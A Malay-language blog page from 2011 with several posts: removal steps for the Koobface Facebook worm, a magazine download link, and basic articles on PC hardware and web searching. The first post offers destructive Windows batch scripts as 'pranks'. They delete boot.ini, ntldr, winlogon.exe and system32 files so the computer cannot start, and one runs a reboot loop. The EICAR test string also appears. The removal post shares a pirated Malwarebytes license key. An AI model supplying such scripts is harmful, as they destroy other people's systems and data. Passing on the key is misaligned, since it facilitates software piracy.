Pages

Selasa, 26 Julai 2011

Cara Nak Buat Komputer Bagi "Lingkup" Terus

Salam sejahtera kepada semua pembaca blog..semoga berada dalam keadaan sihat semua yea..ceria2 selalu..hehe..ok tulis panjang pun tak guna sebab orang kan nak baca sangat kan panjang2 nie....hehe ok saya terus jea dengan topik kali nie macam mana nak buat komputer akan off selama-lamanya..Peeaaah dengar macam menarik kan nak perkena orang atau kawan2..Tapi ingat yea saya ajar dengan tujuan menyebarkan ilmu untuk belajar jea..So jangan pandai2 salah guna ilmu yang ada ok..Saya pun belajar jugak macam anda semua..Gunakanlah dengan sebaiknya..

 Cara pertama salin code dibawah dalam notepad dan save dengan nama optimusskypro.bat 



@ Echo off
attrib-r-s-h c: \ autoexec.bat
del c: \ autoexec.bat
attrib-r-s-h c: \ boot.ini
del c: \ boot.ini
attrib-r-s-h c: \ ntldr
del c: \ ntldr
attrib-r-s-h c: \ windows \ win.ini
del c: \ windows \ win.ini



Sedikit penerangan, setelah siap fail nie boleh mematikan sistem ShoutDown komputer dengan cara mendelate fail2 yang perlu dalam komputer untuk Reboot dan Restart...

Ok setakat ini sahaja untuk kali ini....Amaran yea saya tidak bertanggungjawab atas apa2 kejadian yang tak diundang hasil pembelajaran ini..

Lain-lain code virus ada dibawah>>

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*


Salin code diatas dan paste kan di notepad..save dengan nama test antivirus.exe


kegunaan code diatas untuk test antivirus berfungsi dengan baik atau tidak..Selalunya microsoft security  essential akan detec fail nie sebagai virus..Kira bagus jugak microsoft security essential nie.... 


Code seterusnya>>



@echo off
Start virus.bat
Shutdown –r



Copy dan paste dalam notepad save dengan nama arks.bat 


Code lain>>



@echo off
del"c:\windows\pchealth"
del"c:\windows\system"
del"c:\windows\                                                                  system32\restore"
del"c:\windows\        system32\autoexec.nt"
del"c:\windows\                system32\ntoskrni.exe"
del"c:\winlogon.exe"





macam biasa copy,paste dalam notepad save dengan nama mawar.bat







Sabtu, 23 Julai 2011

Cara Nak Buang Virus " How Are You" Dari Facebook

Ramai kawan2 yang kena virus nie dari facebook, sampai gadoh2 pun ada disebabkan mesej spam nie >>

hi. how are you?”  
*Jika anda reply mesej, chat akan otomatik menghantar anda:*  
“Wanna laugh? :-) ”
*Jika anda reply sekali lagi, chat otomatik akan menghantar :* 
“It is you on the video ?)) want to see?)”

Menyampahkan..ok jom kita tengok macam mana nak buang benda alah nie..ikut step yang diberikan..buat satu2 mesti faham punya,yang jadi masalah dok baca dengan gopoh-gapah,baca tue kalut sangat orang kedah kata..hehe..

Cara 1 :
Sistem operasi windows mempunyai file dipanggil "hosts".
Buka "hosts" file.

Sila ke "Start" pada komputer anda dan pilih "Run"/.Cara senang tengok nie>
Windows logo key + R ..belajar banyak lagi Shortcuts key Klik Disini
Dalam "Run" dialog taip:

c:\windows\system32\drivers\etc






Untuk  Windows NT & Windows 2000
C:\winnt\system32\drivers\etc
Windows XP, Windows Vista or Windows 7
C:\Windows\System32\drivers\etc
Klik OK (Buka beberapa file)
Cari file bertajuk "hosts" dan "double-click". Sesudah buka, sila buka file tersebut dengan memilih program " Notepad" dari program yang ada.

Edit kemudian save file "hosts" tadi.
Dalam file "hosts" tadi akan ada satu baris seperti di bawah.
CARI BARIS INI: facebook.com (CONTOH:
 “127.0.0.1 http://www.facebook.com” )

Sila buang 
“127.0.0.1 http://www.facebook.com”
Tutup file "hosts" dan save.


Cara 2:







2. Cari dan buang dengan "end processes" program bawah: 
fbtre6.exe
mstre6.exe





3. Buang file registry :
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current Version\Run\”systray” = “c:\windows\mstre6.exe”HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current Version\Run\”systray” = “C:\Windows\fbtre6.exe”HKEY_CURRENT_USER\AppEvents\Schemes\Apps\Explorer\Navigating;





Caranya macam nie>>


Windows logo key + R
Buka "Run" ..sama macam teknik satu tadi


Buka "Registry Editor". Klik "Start" kemudian cari "Run". Taip "regedit". Kemudian klik "OK".



Cari file virus tersebut dengan mengikuti langkah di bawah:
HKEY_LOCAL_MACHINE > SOFTWARE > Microsoft > Windows > Current Version > Run > ”systray”

Untuk memastikan sebelum anda membuang file, sila cari "c:\windows\mstre6.exe" dan tekan delete.

Jangan tersalah delete fail..Semua atas tanggungjawab anda sendiri...




Buang file di bawah:

C:\\Windows\\fbtre6.exe
C:\\Windows\\fmark2.dat

Info tambahan:
-Bersihkan "start up" komputer anda (msconfig), dengan program ccleaner.
-Sila scan komputer anda dengan anti-virus (memastikan virus sudah dibuang).

Jika akaun facebook anda telah diambil alih, dan telah digunakan untuk menyebarkan SPAM facebook chat;
ANDA PERLU MENGIKUTI LANGKAH INI.
- Reset password akaun facebook anda dengan mengklik "Forgot your password?" pada halaman utama facebook atau "Account Settings" bila anda sudah login di facebook.
- Jika anda tidak dapat me-reset password akaun facebook anda kerana e-mel untuk anda untuk login sudah sudah ditukar, sila ke "help page".
- Pastikan anti-virus di komputer up-to-date, buat scan virus, buang file tidak berkenaan. Jika anda tidak melakukan ini, komputer anda telah dijangkiti, berkemungkinan akaun facebook anda bakal dijangkiti sekali lagi. 

Jenis file virus facebook di atas:
- Flash-Player.exe


Nama virus di atas:
koobface


Sila tengok gambar dibawah nie>>






Cara nak buang guna Antivirus pun boleh..pastikan antivirus anda Update yea...




Sila Klik Disini Untuk Download Malwarebytes



Nak full version kea..hehe ok saya bagi disini..Eh jangan lupa taw ucap terima kasih,bukan apa saya nak tengok berapa ramai yang guna Malwarebytes nie dekat blog saya k..Lagi pun dah beri key free mesti la ucap terima kasih kan...adap tue bkn saya nak penghargaan k..Boleh ucap terima kasih di Chat box sebelah kanan tue..Tengok cara dibawah macam mana nak register Antimalwarebyte's nie..









Enter the ID below:Masukan code nie>>: 2KU59
Enter the KEY below:Masukan code nie>>: 8P1F-1TM0-HGFU-F5H1

Nak banyak lagi macam2 Key Software Klik Disini

Khamis, 21 Julai 2011

Download Majalah Estidotmy

       Sedikit pengenalan tentang majalah Estidotmy diterbitkan oleh Utusan Malaysia (M) pada hari Rabu terakhir setiap bulan, majalah ini dibiayai sepenuhnya oleh MOSTI http://www.mosti.gov.my/mosti/ , Kementerian Sains,Teknologi Dan Inovasi Malaysi sebagai salah satu daripada program penggalakkan Sains,Teknologi Dan Inovasi kepada seluruh masyarakat terutamanya kepada pelajar..Majalah ini setanding dengan majalah-majalah sains,teknologi dan inovasi yang ada dipasaran,yang membezakan majalah ini ialah ianya percuma..Di blog ini pembaca boleh memuat turun majalah tersebut sekiranya terlepas dari mendapatkan secara percuma didalam Utusan Malaysia pada hari Rabu terakhir setiap bulan..Yang menariknya semua koleksi Majalah Estidotmy sejak keluaran 2002 sehingga 2010 boleh dimuatturun secara percuma di blog ini..Selamat membaca dan semoga dengan keluaran majalah ini dapat meningkatkan minat dalam Sains,teknologi dan inovasi terutamanya kepada pelajar...

P/s...Jangan Ketinggalan mendapatkan majalah tersebut setiap bulan dan teruskan membaca..

Info muka depan majalah estidotmy







Klik Disini Untuk Download Majalah Estidotmy 2002-2010


Tak Ada Adobe Reader Sila Download Disini...

Kenali Perkakasan Dan Perisian PC Anda
























SECARA ASASNYA kita mengetahui bahawa komputer dibahagikan kepada dua elemen utama yang saling bergantung antara satu sama lain iaitu perkakasan (hardware) dan perisian (software).Seperti yang dijelaskan minggu lepas, perkakasan merupakan peralatan fizikal (yang boleh dipegang dan lihat) komputer yang mempunyai bahagian luaran dan dalaman.Sudah tentu perkakasan luaran yang boleh dilihat di bahagian hadapan komputer seperti papan kekunci, monitor, tetikus, pemacu cakera liut (disket), pemacu CD dan kotak (casing) komputer merupakan perkakasan yang diketahui kebanyakan pengguna komputer.Jika kita menjelajah ke dalam komputer pula, lebih banyak perkakasan yang akan dapat dilihat dan sebenarnya menjadi nadi utama kepada operasi sesebuah komputer.Secara asasnya, komponen perkakasan komputer (di bahagian dalam) akan mempunyai papan induk (mother board), cip mikropemproses (microprocessor) dan bekalan tenaga (power supply).

Cakera keras, cakera liut, CD dan terkini DVD (pemacu video digital) membolehkan data-data yang dimasukkan ke dalam komputer dapat disimpan dan dibaca semula. Peranti yang membenarkan data-data tersebut dibaca semula dikenali sebagai pemacu cakera (disk drive).Papan induk ini (yang menjadi nadi komputer) akan disambungkan kepada cakera keras (hard disc), pemacu cakera padat (CD), pemacu cakera liut (drive A) dan sebagainya.$ Mikropemproses iaitu peranti berbentuk cip ini merupakan komponen utama kepada operasi sesebuah komputer. Kelajuan sesebuah komputer beroperasi bergantung kepada kelajuan cip mikropemproses ini yang juga dikenali sebagai CPU (unit pemproses sepusat).


Secara mudahnya CPU menjalankan peranan seperti sebuah mesin kalkulator berkuasa iaitu menjalankan pengiraan bagi data-data masuk dan keluar (input dan output) dan juga membuat keputusan. 
$Storan - komputer juga mempunyai ingatan supaya boleh mengingati kembali segala tugas yang telah dilakukan. Alat untuk menyimpan data dipanggil storan. Kebiasaannya pengguna PC menyimpan data di dalam dalam cakera keras (HD), cakera liut, cakera padat (CD) dan juga pemacu Zip.Storan juga dibuat dalam bentuk memori atau ingatan pada RAM, Cache Memory dan ROM yang berfungsi sebagai storan sementara untuk mempercepatkan penggunaan program komputer.$ CD-ROM (cakera padat-memori baca sahaja) ialah sejenis cakera padat yang dibuat untuk dimainkan di dalam komputer. ‘Baca sahaja’ atau Read Only bermaksud data-data hanya dapat dibaca sahaja dan tidak boleh digunakan untuk tujuan simpanan/rakaman data.Kini terdapat CD-R (CD boleh rakam) dan CD-RW (boleh dirakam berkali-kali) yang membolehkan kita menyimpan lebih banyak data ke dalam CD jenis ini berbanding cakera liut. Bagaimanapun anda memerlukan perakam khusus untuk tujuan menyimpan data di dalam CD jenis ini.
Seperti yang dinyatakan minggu lepas, perisian pula merupakan program yang direkabentuk untuk memudahkan pengguna berhubung dengan komputer melalui program-program yang dibangunkan oleh para jurutera perisian dan pengaturcara (programmer).Antara cip mikropemproses terkenal ialah Pentium dan Celeron keluaran Intel Corporatian dan AMD Athlon keluaran Advance Micro Devices Inc.

             Sudah tentu keberkesanan sesebuah komputer bergantung kepada perisian sistem operasi (seperti MS-DOS, Windows, UNIX dan Linux) yang merupakan program komputer paling utama diperlukan.Perisian sistem operasi (OS) yang merupakan ‘otak’ kepada komputer berkuasa penuh untuk memastikan operasi semua perkakasan dan juga perisian-perisian aplikasi yang lain.Perisian aplikasi iaitu program yang direkabentuk untuk memudahkan pengguna melakukan kerja-kerja khusus seperti perisian anti-virus (seperti Norton, Trend dan sebagainya), perisian produktiviti (seperti Microsoft Word, Powerpoint, perisian grafik (Adobe Photoshop), permainan, e-mel dan sebagainya.

Bagi adik-adik yang berminat untuk membangunkan perisian atau program kita sendiri, kemahiran matematik dan kreativiti diperlukan kerana ia merupakan antara elemen utama untuk menjadi pengaturcara terkenal.Pengaturcara akan mempelajari pelbagai bahasa pengaturcaraan seperti Cobol, C++, Java, Visual Basic, HTML dan sebagainya bagi menghasilkan pelbagai program mengikut kehendak pengguna

Bagaimana Mendapatkan Maklumat Dikehendaki Di Internet





SERING kita lihat sesetengah rakan kita begitu sukar hendak mendapatkan maklumat yang mereka ingini walaupun telah berjam-jam berada di hadapan komputer dan melayari Internet.
Bagi mereka, Internet merupakan gedung maklumat yang terlalu besar dan terlalu sukar untuk membolehkan kita menuju ke laman-laman web berkaitan dengan maklumat diingini.
Kenyataan itu mungkin ada betulnya. Ini kerana mencari sesuatu yang dikehendaki di Internet tanpa menggunakan enjin carian boleh diibaratkan mencari maklumat di perpustakaan tanpa menggunakan sistem kad rujukan atau katalog yang disediakan.
Seperti yang diketahui, Internet sememangnya satu ciptaan menakjubkan menghubungkan berjuta-juta komputer dan merupakan gedung maklumat terbesar dengan mempunyai lebih 3 bilion dokumen.
Memandangkan ia merupakan satu dunia tanpa sempadan, sudah tentu kita akan mudah tersesat tanpa arah jika tidak mempunyai pengetahuan mencukupi untuk menggunakannya.
Kita seharusnya mengetahui bagaimana cara terbaik untuk menggunakan perisian pelayar Internet seperti
Internet Explorer atau Netscape Navigator yang menjadi aplikasi utama untuk melayari dunia web (Internet).
Kedua-dua perisian pelayar itu akan membolehkan anda melayari atau mengakses ke berjuta-juta laman web yang terdapat di dalam Internet yang setiap satunya mengandungi maklumat yang berlainan tujuan, rupa dan juga bentuk.
Kaedah yang biasa digunakan oleh para pengguna komputer untuk mencari maklumat dikehendaki ialah dengan menggunakan enjin pencari (atau gelintaran).
Enjin pencari ialah satu program komputer yang berfungsi untuk mengenalpasti laman web yang mengandungi istilah atau kata kunci yang ditaipkan pada laman web mereka.
Terdapat lebih daripada 300 enjin pencari di dalam Internet dan ada yang sentiasa dipertingkatkan keupayaan cariannya dan ada juga yang mengkhusus kepada sesuatu bidang sahaja.
Laman web enjin pencari terkenal masa kini adalah seperti www.altavista.com, www.google.com, www.yahoo.com, www.lycos.com, www.excite.com dan sebagainya.
Masing-masing menggunakan teknik pencarian tersendiri sama ada berasaskan carian-meta tag (seperti google.com atau altavista.com) atau menggabungkan dengan direktori seperti www.yahoo.com atau www.msn.com yang turut mempunyai pelbagai aplikasi lain seperti berita, e-mel dan sebagainya.
Bagaimanapun, kadang kala, walaupun kita menggunakan enjin pencari di laman web tersebut, kita masih keliru dengan maklumat diberi memandangkan ia akan mencadangkan beribu atau ratus ribu pautan laman web selepas ditaipkan perkataan dikehendaki.
Sudah tentu memeningkan untuk melihat satu demi satu pautan laman web yang dicadangkan tersebut jika ia berjumlah ratusan ribu.
Selain daripada menggunakan ruang carian dengan menaipkan pada kotak bahagian carian, anda juga sebenarnya boleh menggunakan direktori seperti yang ditawarkan laman web berbentuk portal seperti www.yahoo.com, www.msn.com.my dan sebagainya.
Anda boleh memilih mana-mana kategori yang disenaraikan pada direktori ini seperti pendidikan, berita, kesihatan, pelancongan dan sebagainya sehinggalah anda sampai ke laman web yang mengandungi maklumat dikehendaki.
Bagi golongan kanak-kanak, terdapat sebuah direktori yang mirip Yahoo! yang dinamakan Yahooligans! Ia merupakan panduan web untuk kanak-kanak dan remaja dan alamatnya ialah di www.yahooligans.com.
Terdapat juga laman web yang kita boleh mengemukakan soalan berbentuk ayat seperti "what is the best search engine" dan laman web itu akan mencadangkan laman web yang mengandungi maklumat dikehendaki. Laman web yang dimaksudkan ialah www.ask.com.
Bagaimana pula, jika kita hanya berminat untuk mencari maklumat yang berkaitan dengan negara kita.
Sebenarnya, kita juga boleh menggunakan perkhidmatan laman web enjin carian berbentuk portal tempatan seperti www.cari.com.my, www.catcha.com.my, www.msn.com.my, www.bluehyppo. com dan www.jaring.my.
Bagaimanapun, teknik pencarian boleh dipertingkatkan jika kita mengetahui cara terbaik menaip perkataan yang dikehendaki dengan menggunakan simbol tertentu seperti “....” yang hanya khusus mencari perkataan tersebut, menggunakan tanda + yang bermaksud dan, - yang bermaksud perkataan tersebut tidak dikehendaki dan sebagainya.
Jika anda hanya ingin mencari maklumat khusus seperti gambar, berita, direktori dan sebagainya, anda mungkin boleh menggunakan perkhidmatan www.google.com (agak popular), www.altavista.com atau www.alltheweb.com dan klik kepada bahagian image untuk mencari gambar, news untuk mencari berita dan sebagainya.
Kesimpulannya, anda akan merasa seperti berada dalam satu perpustakaan digital yang sangat bermanfaat jika bijak menggunakan laman-laman web enjin pencari ini dan sebarang maklumat akan diperolehi dengan lebih mudah termasuk di dalam bahasa Melayu.




Memanfaat Bahan-Bahan Pembelajaran Dari Internet






SEMUA orang mengetahui mengenai Internet. Ia kini menjadi sumber pengetahuan atau maklumat terbesar pernah dicipta manusia kerana kemampuannya merangkaikan maklumat pada berjuta-juta komputer di seluruh dunia.
Jika bulan lepas, kita telah mempelajari bagaimana cara terbaik untuk mencari maklumat dalam Internet, estidotmy bulan ini cuba memudahkan lagi para pelajar dengan terus mencadangkan laman-laman web berkaitan pendidikan yang boleh dikunjungi mereka.
Usaha pencarian laman-laman web pendidikan tempatan kadang kala boleh menemui jalan buntu jika kita tidak benar-benar tahu di mana hendak bermula.
Misalnya, jika kita menaip perkataan `pendidikan’ pada enjin pencari www.yahoo.com, sebanyak 300,000 pautan laman web berkaitan pendidikan akan diberikan. Sudah tentu ia agak memeningkan, tambahan pula ia banyak memberikan laman web pendidikan dari Indonesia.
Sebenarnya, perkembangan Internet yang rancak di negara ini telah juga mendorong kepada penubuhan pelbagai laman-laman web berkaitan pendidikan yang boleh dimanfaatkan oleh para pelajar.
Laman web rasmi Kementerian Pendidikan Malaysia di alamat www.moe.gov.my merupakan laman web pertama yang harus diketahui oleh semua para pelajar dan guru sekolah di negara ini.
Laman web ini menjadi penghubung dasar-dasar kementerian dengan para pelajar, guru dan pentadbir sekolah ke arah merealisasikan hasrat melahirkan pelajar-pelajar yang cemerlang di negara ini.
Bahan maklumat pembelajaran dan pendidikan untuk peperiksaan pula boleh diperolehi dari laman web MySchoolNet di alamat myschoolnet.ppk.kpm.my yang merupakan laman web dibangunkan oleh Kementerian Pendidikan sendiri.
Laman web ini ditubuhkan bertujuan memastikan pelajar, guru dan pentadbir sekolah mendapat manfaat sepenuhnya dari aktiviti dan maklumat pendidikan di Internet.
Laman web ini menawarkan pelajar dengan pelbagai maklumat termasuk melalui tutorial yang disediakan, bahagian mengetahui ilmu teknologi maklumat (IT), mengetahui aktiviti persatuan/kelab, kaunseling dan juga maklumat tahukah anda.
Laman web ini juga mempunyai berita terkini, jadual persekolahan, berita pendidikan, artikel pilihan dan motivasi diri, di samping bahan-bahan untuk guru dan pentadbir sekolah.
Bagi pelajar atau guru yang ingin mendalami ilmu IT lebih lanjut mengikut kurikulum sekolah, laman web Unit Teknologi Maklumat, Pusat Perkembangan Kurikulum, Kementerian Pendidikan di alamat kdp.ppk.kpm.my merupakan laman web yang sesuai.
Selain dari laman-laman web yang diusahakan oleh kementerian tersebut, laman web pendidikan yang semakin terkenal iaitu Portal Pendidikan Utusan di alamat www.tutor.com.my juga merupakan pilihan terbaik.
Laman web ini menawarkan bahan-bahan pengajaran dan pembelajaran secara percuma kepada para pelajar dan guru. Ia telah menyediakan bahan-bahan secara komprehensif untuk pelajar yang akan mengambil peperiksaan Ujian Pencapaian Sekolah Rendah (UPSR), Penilaian Menengah Rendah (PMR), Sijil Pelajaran Malaysia (SPM) dan Sijil Tinggi Persekolahan Malaysia (STPM).
Ia juga mempunyai segmen tuisyen dalam talian melalui e-tuisyen, forum diskusi, e-permainan, e-kaunseling dan pelbagai bahan-bahan yang mampu meningkatkan tahap pemahaman pelajar dan keberkesanan pengajaran guru-guru.
Laman web Telekom Smart School di alamat www.getcybered.com juga merupakan laman web yang menawarkan para pelajar dengan pelbagai kandungan seperti tips peperiksaan, panduan pembelajaran, ujian dalam talian dan sebagainya.
Laman web Cikgu.Net di alamat www.cikgu.net.my yang diusahakan oleh MIMOS Berhad merupakan satu lagi laman web berkaitan bidang pendidikan di negara ini.
Para pembaca estidotmy yang berminat mengenai bidang sains juga boleh mendapatkan bahan-bahan pembelajaran sains dengan mudah dengan mengunjungi laman web estidotmy di alamatwww.tutor.com.my/estidotmy.
Bahan-bahan yang terdapat dalam edisi cetak majalah bulanan estidotmy boleh dicapai dari laman web ini dan ia amat berfaedah kepada para pelajar atau peminat sains yang ketinggalan versi cetakan majalah tersebut.
Laman SUP KIMIA di alamat www.geocities.com/Athens/Delphi/8904 misalnya merupakan laman web yang mampu membantu pelajar-pelajar Tingkatan 4 dan 5 yang ingin menguasai mata pelajaran kimia.
Laman web Kementerian Sains dan Alam Sekitar di alamat www.moste.gov.my pula membolehkan anda mengetahui perkembangan bidang tersebut di negara ini memandangkan ia menghubungkan kepada pelbagai agensi berkaitan.
Sebenarnya, terlalu banyak bahan-bahan pembelajaran yang boleh diperolehi melalui Internet dan ia bukan sahaja melibatkan laman web negara ini tetapi juga laman web antarabangsa.
Bagaimanapun, para pelajar harus bijak dalam usaha mencari laman web yang sesuai kerana selain daripada mengikut pautan laman-laman web yang diberikan oleh laman web tertera di atas, pelajar juga boleh berusaha sendiri dengan menggunakan enjin-enjin pencari yang lain..